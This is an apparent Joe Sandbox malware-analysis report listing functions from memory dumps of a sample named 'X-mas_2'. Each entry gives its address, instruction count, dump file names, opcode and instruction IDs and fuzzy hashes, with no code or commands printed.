Function 020E3137 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
Instruction ID: b6010bfc767b41f88bdb35e7ac68cebcc1eca1ba1b973cb90a2d30eeb48b4b03
Opcode Fuzzy Hash: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
Instruction Fuzzy Hash: BB52D3715083858FCB15CF14C0806BABFE1BF84318F198AADE8DA5B351D775E989DB41

Function 0043F0CB Relevance: .7, Instructions: 655COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
Instruction ID: 4f29358fa94e60aeb1969c962f0f8eec6781083342835fdf5c39f23cee3708bd
Opcode Fuzzy Hash: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
Instruction Fuzzy Hash: E512213AB58351CFC704CF68E8D026AB7E2FB8A314F0A847DD58587361D7789855CB86

Function 004073C0 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
Instruction ID: b00a11197861395ebb150adc986e88646148ed7565683f65526ca2b7b29a586a
Opcode Fuzzy Hash: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
Instruction Fuzzy Hash: DD128631A0C7118BD724DF58D8816ABB3E1FBC4305F29893ED986A7281D738B915CB87

Function 020E7627 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
Instruction ID: aaa1d087730c7abecc3e030c22731193a69b6e2163ac8cf49527c4e1ed0bdb38
Opcode Fuzzy Hash: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
Instruction Fuzzy Hash: 6412A1326087118FDB25DE18D8817BEF3E2EFC4309F19892DC98787291E734A595DB82

Function 004038D0 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06081d7979e64485b4b9bfd17c3a7818582e3d2204cf65424f9c2bc6e9a33dd7
Instruction ID: 8f5dcc2dcb728897a76ec87141d143f4f47f9916a17ff80561f346b336745cb7
Opcode Fuzzy Hash: 06081d7979e64485b4b9bfd17c3a7818582e3d2204cf65424f9c2bc6e9a33dd7
Instruction Fuzzy Hash: A7322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18

Function 020E3B37 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f6b6bf988d0bc28af98b4a3afc124b895597901a604a82cf678b12a907b646
Instruction ID: 04a2276a866aaa4163a1d5646dfb030078b9fca5f5a2d5316850230cbefdeae4
Opcode Fuzzy Hash: 33f6b6bf988d0bc28af98b4a3afc124b895597901a604a82cf678b12a907b646
Instruction Fuzzy Hash: EF3223B0915B118FCB79CF29C58066ABBF2BF85610B504A6ED6A787F90D736F484DB00

Function 0041EFE0 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
Instruction ID: 032fafdfe8fcb9316dd3be8f47d4dae1e8b19dbe72e2b5a4dcd20de423910f36
Opcode Fuzzy Hash: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
Instruction Fuzzy Hash: 45523AB0518B819ED3358F3C8855796BFE5AB5A324F048B9DE0FA873D2C7756002CB66

Function 020FF247 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
Instruction ID: a635b4806fb857210a24320ca6143d66837e7bb3efd61106631f67f4609a1af2
Opcode Fuzzy Hash: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
Instruction Fuzzy Hash: 42523AB0508B818ED3758F3C8855796BFE5AB5A324F048B9DE0FA873D2C7756002CB66

Function 0043F1B0 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
Instruction ID: abfb7d9fc99d8245844b88641aefb67395d9c82b051767d5b5d882fb86d86362
Opcode Fuzzy Hash: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
Instruction Fuzzy Hash: 5D02203AB98351CFC704CF68E8D026AB7E2FBCA314F09887DD58587361D6789855CB86

Function 0043F2F6 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
Instruction ID: 977cdf3f0cd69d8d458b49495e96b3aa17e1ec8412a9fe5b35dbe338883eb9b2
Opcode Fuzzy Hash: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
Instruction Fuzzy Hash: 2BE11F39798351CFC304CF68E89122AB7E2FB8A314F09887DD58687362D778D895CB46

Function 0043F330 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
Instruction ID: 4c2b0347f53e4351c48a861a59ba72d78d96e03e5b29047675d502fe45a0e231
Opcode Fuzzy Hash: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
Instruction Fuzzy Hash: 6EE12139758351CFC708CF68E89062AB7E2FB8A314F09887DD58587362D778D895CB46

Function 00421C80 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
Instruction ID: be10e8665051b82c00c08677856a35fb821d43083445774c7d177a85f24fb323
Opcode Fuzzy Hash: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
Instruction Fuzzy Hash: 26C12772B042209BD7149F24DC8267BB3F1EFA1314F5A842EE89597391E37CED05839A

Function 02101EE7 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd5ddc229369c63acc9baa842020c5256e636006c9f9b9f5fd52b541e1bc7a1
Instruction ID: 8b6d68199f6cf9f8a93925a157c66ed1556fa0c8c0c0bd472c3b9acbdb0bfbda
Opcode Fuzzy Hash: cdd5ddc229369c63acc9baa842020c5256e636006c9f9b9f5fd52b541e1bc7a1
Instruction Fuzzy Hash: C1C12472A843109BD714DF28CC86B6BB3E6EF85314F09852CEC9697281E3B9D905C792

Function 004393D0 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
Instruction ID: 046a7b96ccfc149aed725a1963e6503e11e8b1bcba22f1082ba47fe7bcb8cccf
Opcode Fuzzy Hash: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
Instruction Fuzzy Hash: 46C1AE32A483109BD724DF25CC8172BB7A2ABCA314F19A53EE99567381D378DC01C79A

Function 02119637 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34f5e32b9aa4cafda49141cd82959ecbbf4a6ac09996e7bb4a898317f0356416
Instruction ID: 878d214490c1ca467801d079bbb8a285f3e14b1b67da8f3d1e82ee7c89afea8d
Opcode Fuzzy Hash: 34f5e32b9aa4cafda49141cd82959ecbbf4a6ac09996e7bb4a898317f0356416
Instruction Fuzzy Hash: 88C15672AC83505BD7249F24DCA0B3FB7A2AFC6314F19853CE9A967684D7359C04CB92

Function 0043F450 Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
Instruction ID: 3e46ab952dc263d79a64f3095437ed38b519a89b60fb8defccb58f8934dfbd56
Opcode Fuzzy Hash: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
Instruction Fuzzy Hash: 98D1203A6583508FC304CF78E89126BBBE2FBCA314F09887DE98587361D678D955CB46

Function 00425850 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 619f117b9e7d4e02d5717a9d5929c797240aa76386e188f746d9a77bf4754f46
Instruction ID: fae658bd8ddb3043f4f110c14bac76457b0c84561dfd849755bc4a1f115fdbab
Opcode Fuzzy Hash: 619f117b9e7d4e02d5717a9d5929c797240aa76386e188f746d9a77bf4754f46
Instruction Fuzzy Hash: 15E10FB561C340DFE3249F25E885B2BB7E1FBC5304F94983DE18687261D7789906CB4A

Function 0043F3C0 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
Instruction ID: e9ede8447672369631e443a496d4183c01172dbdfa4dcc616eca2a96a95990bf
Opcode Fuzzy Hash: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
Instruction Fuzzy Hash: D2D1203A758340CFC708CF68E89166AB7E2FB8A314F09887DD58587362D778D895CB46

Function 004058E0 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c07f644e12723037ff367d084df9d5db14ccaeada3b84f4aeb5efdec3e03f4a4
Instruction ID: aae6921d5a17989d66cdc80315faadb92e0547eb6011da501a7e880e04b63f6d
Opcode Fuzzy Hash: c07f644e12723037ff367d084df9d5db14ccaeada3b84f4aeb5efdec3e03f4a4
Instruction Fuzzy Hash: 5AE179711087418FD721DF29C880A2BBBE1EF99300F44882EF5D597792E679E948CB96

Function 020E5B47 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4457b8bbef530b0ec8ff7a72168ac947b05954898d8f4aec68d7b83da9fe319c
Instruction ID: 644dd9a1ed37406c7b35d53b176ad9c7c24b923e2bf4cc44e90e90777ebdf22a
Opcode Fuzzy Hash: 4457b8bbef530b0ec8ff7a72168ac947b05954898d8f4aec68d7b83da9fe319c
Instruction Fuzzy Hash: 8CE178712083418FC725DF29C880A6BFBE5EF98204F448C2DE5D687751E375E988DBA6

Function 0041D530 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd14778522476ee65d3a3e71fd38209e9ad3e1b72483ae0a20f5c01825fd81a
Instruction ID: bc063801e0b7d3404796c06f73d7381230a3f611ffcc32f54e55ab691aceff1e
Opcode Fuzzy Hash: 3bd14778522476ee65d3a3e71fd38209e9ad3e1b72483ae0a20f5c01825fd81a
Instruction Fuzzy Hash: F3B108B9904201AFD7109F24CC41B5BBBE1BF98358F144A7EF4A8973A0D73A99588F46

Function 020FD797 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9de4b62d507b70e770ffcc802e8f394b97ea7bd409e95271fe171e5a72a6be98
Instruction ID: 856cb1be80ba30a8d487641f62decd308015dec8d30d9ec7291b42a07fa9ed4a
Opcode Fuzzy Hash: 9de4b62d507b70e770ffcc802e8f394b97ea7bd409e95271fe171e5a72a6be98
Instruction Fuzzy Hash: 67B11276588301AFD7509F24CC45B1ABBE2BFD4314F048A7CF998A36A0D7769815EF82

Function 00406160 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c12fcaa893704ba3a3abf2a1d9b2e78b5fd7c594974b0ad341749cb65ae105
Instruction ID: c1a9b7a256966d7355f078d51cac888a243f3eaa5ef4bc6392bd96d6d9370d7a
Opcode Fuzzy Hash: e5c12fcaa893704ba3a3abf2a1d9b2e78b5fd7c594974b0ad341749cb65ae105
Instruction Fuzzy Hash: 39C15BB29487418FC360CF28DC86BABB7E1BF85318F09492DD1DAD6342E778A155CB46

Function 020E63C7 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c12fcaa893704ba3a3abf2a1d9b2e78b5fd7c594974b0ad341749cb65ae105
Instruction ID: 9c3258774c34ee46e6e30e08f4721f9300a667c3d868a93458e6167a712e78c5
Opcode Fuzzy Hash: e5c12fcaa893704ba3a3abf2a1d9b2e78b5fd7c594974b0ad341749cb65ae105
Instruction Fuzzy Hash: E3C18EB2A087418FC770CF28DC86BABBBE1BF85318F08492DD1DAC6242D779A155CB05

Function 00428100 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
Instruction ID: 7060ff257f1d57e8326384c3aaed6f283346be69202c19536aca7bdb8c3aaad4
Opcode Fuzzy Hash: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
Instruction Fuzzy Hash: B0815774E04224CBDF20CF54D8916AF73B1FF55310F18819DD8856B385E7389912CBA9

Function 00432800 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
Instruction ID: 1303130b957ef33d10d9c1787a5ad37353acd530864993bbcf8375f38532070f
Opcode Fuzzy Hash: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
Instruction Fuzzy Hash: A3812637749A800BD32CAD7D4C522A6B9835BDA330F3DD37EA5B18B3E5E9A848025345

Function 0043FE20 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
Instruction ID: 0bfc5a374a60af3586e218f93e2c2928d82f03b66c5554fb0b2c1f037090387e
Opcode Fuzzy Hash: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
Instruction Fuzzy Hash: CC911435A083019FE714CF18D891A2BB3E2EFD9710F19952DEA858B3A5DB35DC11CB4A

Function 02112A67 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
Instruction ID: a4299bae503f0e55800d3d840c2ca94af8c96f9636dafeb2fd79b32a5e41589d
Opcode Fuzzy Hash: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
Instruction Fuzzy Hash: 1C811B37799A900BD33C9D7D9C523A679834BD7230B2EC37EA9B58B3E5EAB548014344

Function 02120087 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd32615a5666b5d1a7eb61ee71e783d790e68f9514868b483f041d5a4739fc6e
Instruction ID: f1e7b6c4d169039ee23f8dd63554b9fc5c9606068943e7eeff80f5f384509aa8
Opcode Fuzzy Hash: cd32615a5666b5d1a7eb61ee71e783d790e68f9514868b483f041d5a4739fc6e
Instruction Fuzzy Hash: 9D91D1756883219FD718CF18C990A2BB3E2EF99314F19866CF985873A5DB31DC25CB42

Function 02118757 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d86d9187bac492f40e8ec56eaab7b1c070af71cd98ee382b49f9a81f65ee95ca
Instruction ID: acbf48bd6fd54eb569182945ecb2b1062c65245ff7b217cbd05e9dc770f6b6f3
Opcode Fuzzy Hash: d86d9187bac492f40e8ec56eaab7b1c070af71cd98ee382b49f9a81f65ee95ca
Instruction Fuzzy Hash: 93A1E13268C7848FE3089A28D45436ABBD29BC6318F1ACA7DE4D6473D2D3B98545C747

Function 004390A0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
Instruction ID: b66e43f3b97cf1dfe37cda8ef161d74f150199c18f2f0b2dd8126107ca88f700
Opcode Fuzzy Hash: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
Instruction Fuzzy Hash: C77134756482009BE7148F29DC8172F73A6EFC9304F19983EE68657296DB788C01DB5A

Function 0043C1B0 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
Instruction ID: b6c6c0bb9063e71726147574d8d4a9f3fa072b62720395db4690d828467e09fc
Opcode Fuzzy Hash: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
Instruction Fuzzy Hash: 5B613432F442108BD7209F69D8C126BB7A2ABD9320F1E953ED8C4B7315D6799C5287C6

Function 0211C417 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a62da56a04965444107887f331e189a453e813c89ef95b0ddeb281fa9cac0b5
Instruction ID: 304fb74a85b2263783b5054be90c9b59a5496f9d59c16b24dcc768ce99f4574d
Opcode Fuzzy Hash: 2a62da56a04965444107887f331e189a453e813c89ef95b0ddeb281fa9cac0b5
Instruction Fuzzy Hash: 72614572FC43505BD7209F6DC8807ABB7A2ABC5328F1E853ED88497655D3719852C7C2

Function 0042895A Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
Instruction ID: fd324c467d0d4d67cb19f0be7c245ecd171908bcd495dc43fa11a230d99e3a73
Opcode Fuzzy Hash: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
Instruction Fuzzy Hash: 7D61E7B5E01226CBCB148F54C861ABEB7B1FF56310F19829DD8466F391E7389841CB98

Function 02108BC1 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2508813e6418bbb85c5464cf00bafe144524ef1e8a0a3f50558454acbc9b08
Instruction ID: 79779a1a987e76c7aebe330056eb91a30c25a686b3ae18be23536fb96cd4b694
